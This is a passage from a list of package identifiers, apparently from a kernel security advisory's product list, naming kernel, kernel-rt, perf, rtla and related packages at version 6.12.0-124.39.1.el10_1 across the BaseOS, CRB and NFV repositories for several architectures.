"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
